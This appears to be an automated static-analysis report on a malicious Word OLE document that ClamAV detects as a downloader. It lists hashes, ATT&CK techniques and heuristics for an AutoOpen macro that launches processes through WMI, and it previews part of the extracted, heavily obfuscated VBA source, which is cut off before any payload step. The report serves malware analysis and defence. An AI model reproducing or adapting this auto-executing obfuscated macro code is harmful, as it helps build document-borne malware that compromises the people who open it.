Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2cc40e5dc84b3808…

MALICIOUS

Office (OLE)

185.9 KB Created: 2019-04-16 14:01:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: f00573dd517407cba00e54966a5fd87b SHA-1: 45e737a70bbbcf1dcf492f52219a256ac5fff206 SHA-256: 2cc40e5dc84b380886936a767f4b3d85b106d07d5b8ded5c801b3f89cf744458
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains a critical heuristic firing for VBA WMI Win32_Process launcher, indicating the use of Visual Basic macros to execute arbitrary code. The presence of an AutoOpen macro and GetObject calls further supports this. The script's intent is to leverage WMI to create a new process, likely to download and execute a secondary payload, as suggested by the ClamAV detection name 'Doc.Downloader'.

Heuristics 8

  • ClamAV: Doc.Downloader.00536d-6941907-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.00536d-6941907-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 32269 bytes
SHA-256: 180b60b37f6b2d7ca6bb0da15012cfe0683a71d68e608369b613b10b20b341a4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "NGDGxQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "S_AACXQD"
Attribute VB_Base = "0{70959F31-593E-412A-9A0A-39C4C314EA6D}{6640755B-1874-4CD3-A1C7-B1D09AB67CC9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "vcA4ABAQ"
Attribute VB_Base = "0{AECFE2FD-10A3-437B-96D2-F1210DFA7F95}{BB34A576-4813-4113-81DE-246BC69781BB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "MZAACA"
Sub autoopen()
   If kAUAQ_AB = QXAAAAx Then
      Select Case jDBU_wDU
         Case 226449590
            WAB41AA = Rnd(rAAAAAAD + 677670062 + 2798646 / vwCAkACU)
            CADxX4 = CByte(pBDoAAXQ + 234393663 + lUwUZQAA + 868441809)
         Case 156554485
            wwAGAUk = LAXBBAXA
            AkAcUAA = Tan(NcAUU_A - CSng(LxAkDA))
      End Select
End If
   If rkQAZwAA = pAZAAAZ Then
      Select Case kA4ACA
         Case 80623455
            LBDDBk = Rnd(uAQDAA + 946247038 + 94711518 / dZAwAAU)
            NC4XAAAU = CByte(kDDcAQX + 578789574 + FAAUwZAD + 11133948)
         Case 433685152
            XDDAAkk = hAGQAXZ1
            s4AA4o = Tan(vkAUAQAA - CSng(IwA__x_B))
      End Select
End If
   If LxQDoAQQ = kQBAXAB Then
      Select Case zCQAoc
         Case 906699795
            qU4AoUB = Rnd(wAGXUQ + 675552437 + 571895460 / PUACAA)
            WkADcAkC = CByte(ooAZ1Q4A + 637281627 + Nw1DAXC + 777502892)
         Case 438121677
            QBAQwoG = WUAAUC
            OAD4Q1X = Tan(kAAXAGQ - CSng(RAQQUUw))
      End Select
End If
uBAGcC
   If qAXc1B = zQAAxDA Then
      Select Case wQXAXBAA
         Case 612525908
            vBC4XC = Rnd(zA_1A4Xc + 251468979 + 164549338 / H1AA_4B)
            nAGQABD4 = CByte(DX1DX_Z + 473168191 + tXDUwC + 632693492)
         Case 139213862
            iDQQXA = YxADwQB
            vwGCkQ4A = Tan(wQACwAo - CSng(jQA1UccQ))
      End Select
End If
   If ICocAA = YoAD4Ak Then
      Select Case w4DCAAA
         Case 337117213
            fAAAUA = Rnd(WAABCX + 680197576 + 909755657 / nUAUA4)
            pAA4AGA = CByte(hUBAXDx + 697198569 + TGA1AA + 591693543)
         Case 573806582
            JB_Z1kA = w4w_GxZD
            fQUA_AA = Tan(iXADADDQ - CSng(nDAQoD))
      End Select
End If
End Sub

Attribute VB_Name = "iBADUAkX"
Function uBAGcC()
On Error Resume Next
   If jQAcAU = sABGBADZ Then
      Select Case Fx1AQAxC
         Case 411757465
            NDBZ1_A = Rnd(nXAABUD + 952478814 + 254718867 / OAxxXADQ)
            Q1QZ4o1A = CByte(wBGXAAD + 433126122 + DGQQAZA + 546119096)
         Case 280958406
            TkQAAw = ZAQGAx
            rkCGAU = Tan(hQADDQAo - CSng(dUkAxxC))
      End Select
End If
   If jXDcQUA = XAAcX4QA Then
      Select Case nAQwAAAA
         Case 490152013
            j4BwCA4A = Rnd(zAAoAGZ + 748850684 + 32846237 / bxAAkCQ)
            MBcxQB = CByte(LCAAU1QA + 622645831 + YAA_UDA + 569507069)
         Case 647274870
            iDQcUAAo = RAQDAA
            HAZ4BUXA = Tan(i41GBU1 - CSng(Uo4cAw))
      End Select
End If
If 1337 < 24328 Then
zDAAA4 = vbFalse
   If fkD1cCDB = HAGAA1oB Then
      Select Case DQAckQU_
         Case 267900430
            nAAUkB = Rnd(LCZBo_B + 654686259 + 33754147 / sAxkGA)
            H_Ao1A = CByte(kZUXABk + 236626823 + zQZ1oGU + 42840483)
         Case 779844403
            v_AGAXxc = bADAAA
            PAQwkDU4 = Tan(iZAAkAQ - CSng(bUDkAB))
      End Select
End If
   If oBZkXQ1_ = hGC4BoB Then
      Select Case uAA_UQZ
         Case 886016921
         
... (truncated)